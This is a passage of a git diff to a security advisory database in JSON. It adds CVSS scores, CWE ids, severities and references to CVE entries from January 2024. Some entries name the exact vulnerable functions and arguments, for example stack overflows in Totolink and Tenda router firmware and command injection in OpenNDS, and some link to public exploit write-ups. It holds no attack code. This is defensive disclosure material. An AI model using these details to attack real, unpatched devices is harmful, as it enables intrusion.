"nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8pp2-pfr8-5hm5/GHSA-8pp2-pfr8-5hm5.json b/advisories/unreviewed/2024/01/GHSA-8pp2-pfr8-5hm5/GHSA-8pp2-pfr8-5hm5.json index 493954c73fc95..721798d9e850f 100644 --- a/advisories/unreviewed/2024/01/GHSA-8pp2-pfr8-5hm5/GHSA-8pp2-pfr8-5hm5.json +++ b/advisories/unreviewed/2024/01/GHSA-8pp2-pfr8-5hm5/GHSA-8pp2-pfr8-5hm5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8pp2-pfr8-5hm5", - "modified": "2024-01-25T06:30:31Z", + "modified": "2024-02-01T18:31:08Z", "published": "2024-01-25T06:30:31Z", "aliases": [ "CVE-2024-23985" ], "details": "EzServer 6.4.017 allows a denial of service (daemon crash) via a long string, such as one for the RNTO command.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T05:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8qcc-g56h-g74w/GHSA-8qcc-g56h-g74w.json b/advisories/unreviewed/2024/01/GHSA-8qcc-g56h-g74w/GHSA-8qcc-g56h-g74w.json index 07e45073ad985..e476e27407e61 100644 --- a/advisories/unreviewed/2024/01/GHSA-8qcc-g56h-g74w/GHSA-8qcc-g56h-g74w.json +++ b/advisories/unreviewed/2024/01/GHSA-8qcc-g56h-g74w/GHSA-8qcc-g56h-g74w.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8qcc-g56h-g74w", - "modified": "2024-01-26T09:30:22Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:22Z", "aliases": [ "CVE-2023-48127" ], "details": "An issue in myGAKUYA mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:56Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8qq6-2q43-h362/GHSA-8qq6-2q43-h362.json b/advisories/unreviewed/2024/01/GHSA-8qq6-2q43-h362/GHSA-8qq6-2q43-h362.json new file mode 100644 index 0000000000000..4e4899f9efe3b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8qq6-2q43-h362/GHSA-8qq6-2q43-h362.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8qq6-2q43-h362", + "modified": "2024-01-29T18:31:53Z", + "published": "2024-01-29T18:31:53Z", + "aliases": [ + "CVE-2024-1011" + ], + "details": "A vulnerability classified as problematic was found in SourceCodester Employee Management System 1.0. This vulnerability affects unknown code of the file delete-leave.php of the component Leave Handler. The manipulation of the argument id leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252280.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1011" + }, + { + "type": "WEB", + "url": "https://github.com/jomskiller/Employee-Managemet-System---Broken-Access-Control" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252280" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252280" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8r5c-mgwc-qg49/GHSA-8r5c-mgwc-qg49.json b/advisories/unreviewed/2024/01/GHSA-8r5c-mgwc-qg49/GHSA-8r5c-mgwc-qg49.json index 2288b5f24174d..55c6a4d9955ed 100644 --- a/advisories/unreviewed/2024/01/GHSA-8r5c-mgwc-qg49/GHSA-8r5c-mgwc-qg49.json +++ b/advisories/unreviewed/2024/01/GHSA-8r5c-mgwc-qg49/GHSA-8r5c-mgwc-qg49.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8r5c-mgwc-qg49", - "modified": "2024-01-24T09:30:25Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-24T09:30:25Z", "aliases": [ "CVE-2023-51711" ], "details": "An issue was discovered in Regify Regipay Client for Windows version 4.5.1.0 allows DLL hijacking: a user can trigger the execution of arbitrary code every time the product is executed.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-427" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T07:15:47Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8r62-6w8q-xrq2/GHSA-8r62-6w8q-xrq2.json b/advisories/unreviewed/2024/01/GHSA-8r62-6w8q-xrq2/GHSA-8r62-6w8q-xrq2.json index fd487da3fdac1..1ec2cbb8f4ecd 100644 --- a/advisories/unreviewed/2024/01/GHSA-8r62-6w8q-xrq2/GHSA-8r62-6w8q-xrq2.json +++ b/advisories/unreviewed/2024/01/GHSA-8r62-6w8q-xrq2/GHSA-8r62-6w8q-xrq2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8r62-6w8q-xrq2", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0805" ], "details": "Inappropriate implementation in Downloads in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Medium)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8r89-2849-x8p3/GHSA-8r89-2849-x8p3.json b/advisories/unreviewed/2024/01/GHSA-8r89-2849-x8p3/GHSA-8r89-2849-x8p3.json index 2846e43ae9c4c..24b62d3e402bb 100644 --- a/advisories/unreviewed/2024/01/GHSA-8r89-2849-x8p3/GHSA-8r89-2849-x8p3.json +++ b/advisories/unreviewed/2024/01/GHSA-8r89-2849-x8p3/GHSA-8r89-2849-x8p3.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-8vhj-m4qr-2chr/GHSA-8vhj-m4qr-2chr.json b/advisories/unreviewed/2024/01/GHSA-8vhj-m4qr-2chr/GHSA-8vhj-m4qr-2chr.json new file mode 100644 index 0000000000000..64f632d3746db --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8vhj-m4qr-2chr/GHSA-8vhj-m4qr-2chr.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8vhj-m4qr-2chr", + "modified": "2024-01-29T15:30:30Z", + "published": "2024-01-29T15:30:30Z", + "aliases": [ + "CVE-2024-1004" + ], + "details": "A vulnerability, which was classified as critical, was found in Totolink N200RE 9.3.5u.6139_B20201216. This affects the function loginAuth of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument http_host leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252273 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1004" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-loginAuth-cbde48da404049328cb698394b6c0641?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252273" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252273" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8xmj-gvcg-7vcw/GHSA-8xmj-gvcg-7vcw.json b/advisories/unreviewed/2024/01/GHSA-8xmj-gvcg-7vcw/GHSA-8xmj-gvcg-7vcw.json index a1974633c1023..0c17f6c807c43 100644 --- a/advisories/unreviewed/2024/01/GHSA-8xmj-gvcg-7vcw/GHSA-8xmj-gvcg-7vcw.json +++ b/advisories/unreviewed/2024/01/GHSA-8xmj-gvcg-7vcw/GHSA-8xmj-gvcg-7vcw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8xmj-gvcg-7vcw", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52329" ], "details": "Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.\n\nPlease note this vulnerability is similar, but not identical to CVE-2023-52326.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9283-2mpg-73m4/GHSA-9283-2mpg-73m4.json b/advisories/unreviewed/2024/01/GHSA-9283-2mpg-73m4/GHSA-9283-2mpg-73m4.json new file mode 100644 index 0000000000000..72f6ff01b26f4 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9283-2mpg-73m4/GHSA-9283-2mpg-73m4.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9283-2mpg-73m4", + "modified": "2024-01-29T03:30:18Z", + "published": "2024-01-29T03:30:18Z", + "aliases": [ + "CVE-2024-0990" + ], + "details": "A vulnerability, which was classified as critical, was found in Tenda i6 1.0.0.9(3857). This affects the function formSetAutoPing of the file /goform/setAutoPing of the component httpd. The manipulation of the argument ping1 leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252255. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0990" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetAutoPing-2e009d81eb7e45438565d5ba6794f4e3?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252255" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252255" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121", + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-93gv-w5cx-phvx/GHSA-93gv-w5cx-phvx.json b/advisories/unreviewed/2024/01/GHSA-93gv-w5cx-phvx/GHSA-93gv-w5cx-phvx.json index 450b4e39668d3..9aa6d0c8f9924 100644 --- a/advisories/unreviewed/2024/01/GHSA-93gv-w5cx-phvx/GHSA-93gv-w5cx-phvx.json +++ b/advisories/unreviewed/2024/01/GHSA-93gv-w5cx-phvx/GHSA-93gv-w5cx-phvx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-93gv-w5cx-phvx", - "modified": "2024-01-23T15:30:57Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:57Z", "aliases": [ "CVE-2024-0745" ], "details": "The WebAudio `OscillatorNode` object was susceptible to a stack buffer overflow. This could have led to a potentially exploitable crash. This vulnerability affects Firefox < 122.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-93h3-xr58-xwf6/GHSA-93h3-xr58-xwf6.json b/advisories/unreviewed/2024/01/GHSA-93h3-xr58-xwf6/GHSA-93h3-xr58-xwf6.json index 141ea85efbbce..dc26041873a2f 100644 --- a/advisories/unreviewed/2024/01/GHSA-93h3-xr58-xwf6/GHSA-93h3-xr58-xwf6.json +++ b/advisories/unreviewed/2024/01/GHSA-93h3-xr58-xwf6/GHSA-93h3-xr58-xwf6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-93h3-xr58-xwf6", - "modified": "2024-01-26T06:30:29Z", + "modified": "2024-02-02T18:30:29Z", "published": "2024-01-26T06:30:29Z", "aliases": [ "CVE-2023-38317" ], "details": "An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the network interface name entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-78" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T05:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-93px-8x98-j7p2/GHSA-93px-8x98-j7p2.json b/advisories/unreviewed/2024/01/GHSA-93px-8x98-j7p2/GHSA-93px-8x98-j7p2.json index 5988636f9dd1b..9cb419140ea19 100644 --- a/advisories/unreviewed/2024/01/GHSA-93px-8x98-j7p2/GHSA-93px-8x98-j7p2.json +++ b/advisories/unreviewed/2024/01/GHSA-93px-8x98-j7p2/GHSA-93px-8x98-j7p2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-93px-8x98-j7p2", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T15:30:22Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23222" ], "details": "A type confusion issue was addressed with improved checks. This issue is fixed in tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -46,6 +49,10 @@ "type": "WEB", "url": "https://support.apple.com/en-us/HT214063" }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2024/Feb/6" + }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2024/Jan/27" @@ -73,13 +80,17 @@ { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2024/Jan/40" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/05/8" } ], "database_specific": { "cwe_ids": [ - + "CWE-843" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-93v2-7c6x-23m2/GHSA-93v2-7c6x-23m2.json b/advisories/unreviewed/2024/01/GHSA-93v2-7c6x-23m2/GHSA-93v2-7c6x-23m2.json index 4fcd00a526846..008136de4d213 100644 --- a/advisories/unreviewed/2024/01/GHSA-93v2-7c6x-23m2/GHSA-93v2-7c6x-23m2.json +++ b/advisories/unreviewed/2024/01/GHSA-93v2-7c6x-23m2/GHSA-93v2-7c6x-23m2.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-9523-w7r4-2c3x/GHSA-9523-w7r4-2c3x.json b/advisories/unreviewed/2024/01/GHSA-9523-w7r4-2c3x/GHSA-9523-w7r4-2c3x.json new file mode 100644 index 0000000000000..67c8b4af8f22d --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9523-w7r4-2c3x/GHSA-9523-w7r4-2c3x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9523-w7r4-2c3x", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-22160" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bradley B. Dalina Image Tag Manager allows Reflected XSS.This issue affects Image Tag Manager: from n/a through 1.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22160" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/image-tag-manager/wordpress-image-tag-manager-plugin-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-95jr-7vvp-xrg6/GHSA-95jr-7vvp-xrg6.json b/advisories/unreviewed/2024/01/GHSA-95jr-7vvp-xrg6/GHSA-95jr-7vvp-xrg6.json index c793e96bc018a..1343145f75797 100644 --- a/advisories/unreviewed/2024/01/GHSA-95jr-7vvp-xrg6/GHSA-95jr-7vvp-xrg6.json +++ b/advisories/unreviewed/2024/01/GHSA-95jr-7vvp-xrg6/GHSA-95jr-7vvp-xrg6.json @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link" }, + { + "type": "WEB", + "url": "https://github.com/beraoudabdelkhalek/research/tree/main/CVEs/CVE-2024-0720" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.251544" diff --git a/advisories/unreviewed/2024/01/GHSA-969g-frgv-hccv/GHSA-969g-frgv-hccv.json b/advisories/unreviewed/2024/01/GHSA-969g-frgv-hccv/GHSA-969g-frgv-hccv.json index 555a0cf4b9116..a2549f220db47 100644 --- a/advisories/unreviewed/2024/01/GHSA-969g-frgv-hccv/GHSA-969g-frgv-hccv.json +++ b/advisories/unreviewed/2024/01/GHSA-969g-frgv-hccv/GHSA-969g-frgv-hccv.json @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://advisory.abay.sh/cve-2023-6524" }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3015598%40mappress-google-maps-for-wordpress%2Ftrunk&old=3001436%40mappress-google-maps-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=" + }, { "type": "WEB", "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3001436%40mappress-google-maps-for-wordpress%2Ftags%2F2.88.13&new=3015598%40mappress-google-maps-for-wordpress%2Ftags%2F2.88.14#file31" diff --git a/advisories/unreviewed/2024/01/GHSA-96c9-2v9p-9chw/GHSA-96c9-2v9p-9chw.json b/advisories/unreviewed/2024/01/GHSA-96c9-2v9p-9chw/GHSA-96c9-2v9p-9chw.json index 40f54f9064d58..7a4a237d44add 100644 --- a/advisories/unreviewed/2024/01/GHSA-96c9-2v9p-9chw/GHSA-96c9-2v9p-9chw.json +++ b/advisories/unreviewed/2024/01/GHSA-96c9-2v9p-9chw/GHSA-96c9-2v9p-9chw.json @@ -28,6 +28,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-284", "CWE-88" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2024/01/GHSA-96gj-xmph-8xrx/GHSA-96gj-xmph-8xrx.json b/advisories/unreviewed/2024/01/GHSA-96gj-xmph-8xrx/GHSA-96gj-xmph-8xrx.json index 964ce3ceebbd9..44bae32586875 100644 --- a/advisories/unreviewed/2024/01/GHSA-96gj-xmph-8xrx/GHSA-96gj-xmph-8xrx.json +++ b/advisories/unreviewed/2024/01/GHSA-96gj-xmph-8xrx/GHSA-96gj-xmph-8xrx.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20981" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-9827-m264-fw2m/GHSA-9827-m264-fw2m.json b/advisories/unreviewed/2024/01/GHSA-9827-m264-fw2m/GHSA-9827-m264-fw2m.json index 160dbc9b1d28c..7029cf84172de 100644 --- a/advisories/unreviewed/2024/01/GHSA-9827-m264-fw2m/GHSA-9827-m264-fw2m.json +++ b/advisories/unreviewed/2024/01/GHSA-9827-m264-fw2m/GHSA-9827-m264-fw2m.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-476" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-98h2-7j4h-7xc5/GHSA-98h2-7j4h-7xc5.json b/advisories/unreviewed/2024/01/GHSA-98h2-7j4h-7xc5/GHSA-98h2-7j4h-7xc5.json index fa245efaf9716..8e161540691fb 100644 --- a/advisories/unreviewed/2024/01/GHSA-98h2-7j4h-7xc5/GHSA-98h2-7j4h-7xc5.json +++ b/advisories/unreviewed/2024/01/GHSA-98h2-7j4h-7xc5/GHSA-98h2-7j4h-7xc5.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-798" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-98qr-f62q-46cx/GHSA-98qr-f62q-46cx.json b/advisories/unreviewed/2024/01/GHSA-98qr-f62q-46cx/GHSA-98qr-f62q-46cx.json index 1b005f56ca8a4..c8488a9b57d22 100644 --- a/advisories/unreviewed/2024/01/GHSA-98qr-f62q-46cx/GHSA-98qr-f62q-46cx.json +++ b/advisories/unreviewed/2024/01/GHSA-98qr-f62q-46cx/GHSA-98qr-f62q-46cx.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20922" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0002/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-9933-5g23-6jq2/GHSA-9933-5g23-6jq2.json b/advisories/unreviewed/2024/01/GHSA-9933-5g23-6jq2/GHSA-9933-5g23-6jq2.json index 77655a5676065..995363e34c51e 100644 --- a/advisories/unreviewed/2024/01/GHSA-9933-5g23-6jq2/GHSA-9933-5g23-6jq2.json +++ b/advisories/unreviewed/2024/01/GHSA-9933-5g23-6jq2/GHSA-9933-5g23-6jq2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9933-5g23-6jq2", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52092" ], "details": "A security agent link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9954-329g-42vc/GHSA-9954-329g-42vc.json b/advisories/unreviewed/2024/01/GHSA-9954-329g-42vc/GHSA-9954-329g-42vc.json index 00c9a8e11e62e..4e9a3e4aa9dc1 100644 --- a/advisories/unreviewed/2024/01/GHSA-9954-329g-42vc/GHSA-9954-329g-42vc.json +++ b/advisories/unreviewed/2024/01/GHSA-9954-329g-42vc/GHSA-9954-329g-42vc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9954-329g-42vc", - "modified": "2024-01-12T18:30:20Z", + "modified": "2024-02-06T12:30:30Z", "published": "2024-01-08T21:30:34Z", "aliases": [ "CVE-2023-51408" diff --git a/advisories/unreviewed/2024/01/GHSA-9cp8-26q6-h5f9/GHSA-9cp8-26q6-h5f9.json b/advisories/unreviewed/2024/01/GHSA-9cp8-26q6-h5f9/GHSA-9cp8-26q6-h5f9.json index 15a6675ed5c6b..0078cb86eaa5c 100644 --- a/advisories/unreviewed/2024/01/GHSA-9cp8-26q6-h5f9/GHSA-9cp8-26q6-h5f9.json +++ b/advisories/unreviewed/2024/01/GHSA-9cp8-26q6-h5f9/GHSA-9cp8-26q6-h5f9.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9cp8-26q6-h5f9", - "modified": "2024-01-26T06:30:29Z", + "modified": "2024-02-02T18:30:29Z", "published": "2024-01-26T06:30:29Z", "aliases": [ "CVE-2023-38318" ], "details": "An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the gateway FQDN entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-78" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T05:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9fh5-955w-9jfh/GHSA-9fh5-955w-9jfh.json b/advisories/unreviewed/2024/01/GHSA-9fh5-955w-9jfh/GHSA-9fh5-955w-9jfh.json new file mode 100644 index 0000000000000..24adb59076f3b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9fh5-955w-9jfh/GHSA-9fh5-955w-9jfh.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9fh5-955w-9jfh", + "modified": "2024-01-29T18:31:50Z", + "published": "2024-01-29T18:31:50Z", + "aliases": [ + "CVE-2023-40546" + ], + "details": "A flaw was found in Shim when an error happened while creating a new ESL variable. If Shim fails to create the new variable, it tries to print an error message to the user; however, the number of parameters used by the logging function doesn't match the format string used by it, leading to a crash under certain circumstances.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40546" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-40546" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241796" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-9fhq-2p6p-h9p8/GHSA-9fhq-2p6p-h9p8.json b/advisories/unreviewed/2024/01/GHSA-9fhq-2p6p-h9p8/GHSA-9fhq-2p6p-h9p8.json new file mode 100644 index 0000000000000..6f0b7d8fad8e3 --- /dev/null +++ 